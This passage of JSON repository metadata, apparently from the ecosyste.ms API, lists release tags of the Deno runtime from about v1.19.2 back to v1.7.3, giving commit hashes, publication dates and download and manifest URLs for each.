00Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at